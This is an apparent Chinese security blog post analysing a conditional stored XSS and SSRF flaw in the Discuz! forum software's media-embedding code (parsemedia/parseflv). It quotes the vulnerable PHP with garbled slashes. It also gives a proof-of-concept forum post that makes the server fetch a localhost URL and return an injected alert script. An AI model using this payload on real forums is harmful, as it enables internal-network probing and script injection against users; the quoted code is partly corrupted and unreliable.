discuz!有条件存储型xss和ssrf

  • A+
所属分类:漏洞时代
摘要

文件source/function/function_discuzcode.phpfunction discuzcode 中跟踪 parsemedia跟踪 parseflv 

文件source/function/function_discuzcode.phpfunction discuzcode

if(!defined('IN_MOBILE')) { if(strpos($msglower, '[/media]') !== FALSE) { $message = preg_replace("//[media=([/w,]+)/]/s*([^/[/{url}')", $message); }

跟踪 parsemedia

function parsemedia($params, $url) { $params = explode(',', $params); $width = intval($params[1]) > 800 ? 800 : intval($params[1]); $height = intval($params[2]) > 600 ? 600 : intval($params[2]); $url = addslashes($url); if(!in_array(strtolower(substr($url, 0, 6)), array('http:/', 'https:', 'ftp://', 'rtsp:/', 'mms://')) && !preg_match('/^static///', $url) && !preg_match('/^data///', $url)) { return dhtmlspecialchars($url); } if($flv = parseflv($url, $width, $height)) { return $flv; }

跟踪 parseflv

function parseflv($url, $width = 0, $height = 0) { $lowerurl = strtolower($url); $flv = $iframe = $imgurl = ''; if($lowerurl != str_replace(array('player.youku.com/player.php/sid/','tudou.com/v/','player.ku6.com/refer/'), '', $lowerurl)) { $flv = $url; } elseif(strpos($lowerurl, 'v.youku.com/v_show/') !== FALSE) { $ctx = stream_context_create(array('http' => array('timeout' => 10))); if(preg_match("/http:////v.youku.com//v_show//id_([^//]+)(.html|)/i", $url, $matches)) { $flv = 'http://player.youku.com/player.php/sid/'.$matches[1].'/v.swf'; $iframe = 'http://player.youku.com/embed/'.$matches[1]; if(!$width && !$height) { $api = 'http://v.youku.com/player/getPlayList/VideoIDS/'.$matches[1]; $str = stripslashes(file_get_contents($api, false, $ctx)); if(!empty($str) && preg_match("//"logo/":/"(.+?)/"/i", $str, $image)) { $url = substr($image[1], 0, strrpos($image[1], '/')+1); $filename = substr($image[1], strrpos($image[1], '/')+2); $imgurl = $url.'0'.$filename; } } } } elseif(strpos($lowerurl, 'tudou.com/programs/view/') !== FALSE) { if(preg_match("/http:////(www.)?tudou.com//programs//view//([^//]+)/i", $url, $matches)) { $flv = 'http://www.tudou.com/v/'.$matches[2]; $iframe = 'http://www.tudou.com/programs/view/html5embed.action?code='.$matches[2]; if(!$width && !$height) { $str = file_get_contents($url, false, $ctx); if(!empty($str) && preg_match("/(.+?)/i", $str, $image)) { $imgurl = trim($image[1]); } } } } elseif(strpos($lowerurl, 'v.ku6.com/show/') !== FALSE) { if(preg_match("/http:////v.ku6.com//show//([^//]+).html/i", $url, $matches)) { $flv = 'http://player.ku6.com/refer/'.$matches[1].'/v.swf'; if(!$width && !$height) { $api = 'http://vo.ku6.com/fetchVideo4Player/1/'.$matches[1].'.html'; $str = file_get_contents($api, false, $ctx); if(!empty($str) && preg_match("//"picpath/":/"(.+?)/"/i", $str, $image)) { $imgurl = str_replace(array('/u003a', '/u002e'), array(':', '.'), $image[1]); } } } } elseif(strpos($lowerurl, 'v.ku6.com/special/show_') !== FALSE) { if(preg_match("/http:////v.ku6.com//special//show_/d+//([^//]+).html/i", $url, $matches)) { $flv = 'http://player.ku6.com/refer/'.$matches[1].'/v.swf'; if(!$width && !$height) { $api = 'http://vo.ku6.com/fetchVideo4Player/1/'.$matches[1].'.html'; $str = file_get_contents($api, false, $ctx); if(!empty($str) && preg_match("//"picpath/":/"(.+?)/"/i", $str, $image)) { $imgurl = str_replace(array('/u003a', '/u002e'), array(':', '.'), $image[1]); } } } } elseif(strpos($lowerurl, 'www.youtube.com/watch?') !== FALSE) { if(preg_match("/http:////www.youtube.com//watch/?v=([^//&]+)&?/i", $url, $matches)) { $flv = 'http://www.youtube.com/v/'.$matches[1].'&hl=zh_CN&fs=1'; $iframe = 'http://www.youtube.com/embed/'.$matches[1]; if(!$width && !$height) { $str = file_get_contents($url, false, $ctx); if(!empty($str) && preg_match("/'VIDEO_HQ_THUMB':/s'(.+?)'/i", $str, $image)) { $url = substr($image[1], 0, strrpos($image[1], '/')+1); $filename = substr($image[1], strrpos($image[1], '/')+3); $imgurl = $url.$filename; } } } } elseif(strpos($lowerurl, 'tv.mofile.com/') !== FALSE) { if(preg_match("/http:////tv.mofile.com//([^//]+)/i", $url, $matches)) { $flv = 'http://tv.mofile.com/cn/xplayer.swf?v='.$matches[1]; if(!$width && !$height) { $str = file_get_contents($url, false, $ctx); if(!empty($str) && preg_match("/thumbpath=/"(.+?)/";/i", $str, $image)) { $imgurl = trim($image[1]); } } } } elseif(strpos($lowerurl, 'v.mofile.com/show/') !== FALSE) { if(preg_match("/http:////v.mofile.com//show//([^//]+).shtml/i", $url, $matches)) { $flv = 'http://tv.mofile.com/cn/xplayer.swf?v='.$matches[1]; if(!$width && !$height) { $str = file_get_contents($url, false, $ctx); if(!empty($str) && preg_match("/thumbpath=/"(.+?)/";/i", $str, $image)) { $imgurl = trim($image[1]); } } } } elseif(strpos($lowerurl, 'video.sina.com.cn/v/b/') !== FALSE) { if(preg_match("/http:////video.sina.com.cn//v//b//(/d+)-(/d+).html/i", $url, $matches)) { $flv = 'http://vhead.blog.sina.com.cn/player/outer_player.swf?vid='.$matches[1]; if(!$width && !$height) { $api = 'http://interface.video.sina.com.cn/interface/common/getVideoImage.php?vid='.$matches[1]; $str = file_get_contents($api, false, $ctx); if(!empty($str)) { $imgurl = str_replace('imgurl=', '', trim($str)); } } } } elseif(strpos($lowerurl, 'you.video.sina.com.cn/b/') !== FALSE) { if(preg_match("/http:////you.video.sina.com.cn//b//(/d+)-(/d+).html/i", $url, $matches)) { $flv = 'http://vhead.blog.sina.com.cn/player/outer_player.swf?vid='.$matches[1]; if(!$width && !$height) { $api = 'http://interface.video.sina.com.cn/interface/common/getVideoImage.php?vid='.$matches[1]; $str = file_get_contents($api, false, $ctx); if(!empty($str)) { $imgurl = str_replace('imgurl=', '', trim($str)); } } } } elseif(strpos($lowerurl, 'http://my.tv.sohu.com/u/') !== FALSE) { if(preg_match("/http:////my.tv.sohu.com//u//[^//]+//(/d+)/i", $url, $matches)) { $flv = 'http://v.blog.sohu.com/fo/v4/'.$matches[1]; if(!$width && !$height) { $api = 'http://v.blog.sohu.com/videinfo.jhtml?m=view&id='.$matches[1].'&outType=3'; $str = file_get_contents($api, false, $ctx); if(!empty($str) && preg_match("//"cutCoverURL/":/"(.+?)/"/i", $str, $image)) { $imgurl = str_replace(array('/u003a', '/u002e'), array(':', '.'), $image[1]); } } } } elseif(strpos($lowerurl, 'http://v.blog.sohu.com/u/') !== FALSE) { if(preg_match("/http:////v.blog.sohu.com//u//[^//]+//(/d+)/i", $url, $matches)) { $flv = 'http://v.blog.sohu.com/fo/v4/'.$matches[1]; if(!$width && !$height) { $api = 'http://v.blog.sohu.com/videinfo.jhtml?m=view&id='.$matches[1].'&outType=3'; $str = file_get_contents($api, false, $ctx); if(!empty($str) && preg_match("//"cutCoverURL/":/"(.+?)/"/i", $str, $image)) { $imgurl = str_replace(array('/u003a', '/u002e'), array(':', '.'), $image[1]); } } } } elseif(strpos($lowerurl, 'http://www.ouou.com/fun_funview') !== FALSE) { $str = file_get_contents($url, false, $ctx); if(!empty($str) && preg_match("/var/sflv/s=/s'(.+?)';/i", $str, $matches)) { $flv = $_G['style']['imgdir'].'/flvplayer.swf?&autostart=true&file='.urlencode($matches[1]); if(!$width && !$height && preg_match("/var/simga=/s'(.+?)';/i", $str, $image)) { $imgurl = trim($image[1]); } } } elseif(strpos($lowerurl, 'http://www.56.com') !== FALSE) { if(preg_match("/http:////www.56.com///S+//play_album-aid-(/d+)_vid-(.+?).html/i", $url, $matches)) {  $flv = 'http://player.56.com/v_'.$matches[2].'.swf'; $matches[1] = $matches[2]; } elseif(preg_match("/http:////www.56.com///S+//([^//]+).html/i", $url, $matches)) { $flv = 'http://player.56.com/'.$matches[1].'.swf'; } if(!$width && !$height && !empty($matches[1])) { $api = 'http://vxml.56.com/json/'.str_replace('v_', '', $matches[1]).'/?src=out'; $str = file_get_contents($api, false, $ctx); if(!empty($str) && preg_match("//"img/":/"(.+?)/"/i", $str, $image)) { $imgurl = trim($image[1]); } } } if($flv) { if(!$width && !$height) { return array('flv' => $flv, 'imgurl' => $imgurl); } else { $width = addslashes($width); $height = addslashes($height); $flv = addslashes($flv); $iframe = addslashes($iframe); $randomid = 'flv_'.random(3); $enablemobile = $iframe ? 'mobileplayer() ? "" : ' : ''; return '$(/''.$randomid.'/').innerHTML=('.$enablemobile.'AC_FL_RunContent(/'width/', /''.$width.'/', /'height/', /''.$height.'/', /'allowNetworking/', /'internal/', /'allowScriptAccess/', /'never/', /'src/', /''.$flv.'/', /'quality/', /'high/', /'bgcolor/', /'#ffffff/', /'wmode/', /'transparent/', /'allowfullscreen/', /'true/'));'; } } else { return FALSE; } }

 

可以看出多处使用 file_get_contentsurl可控,从而存在ssrf并且结果可以,返回 imgurl=用于

source/function/function_followcode.php function fmakeflv($flv) { $randomid = 'video_'.random(3); $flv = is_array($flv) ? $flv : array('flv' => $flv); if(!empty($flv['imgurl'])) { $html = ' '; } else { $html = ''; } return fcodedisp($html, 'video'); }

限制:xss需要后台开启广播功能。ssrf需要 允许使用

[media] [flash] 等多媒体代码旧版本好像默认开启,新版默认关闭,不过后来开启的较多。
发贴(注:需工具提交,不然http://tudou.com 被转为http://tudou.com )
[media=0,0]http://127.0.0.1:8080/s.php?

http://tudou.com/programs/view/aaaa[/media]
http://127.0.0.1:8080/s.php内容为:
/Article/UploadPic/2016-2/20162322318814.gif');">aaalert('a');

discuz!有条件存储型xss和ssrf
discuz!有条件存储型xss和ssrf
aaalert('a');
ssrf 可能shell内网 百度某个从SSRF到内网WebShell之2
解决方案:
过滤

发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: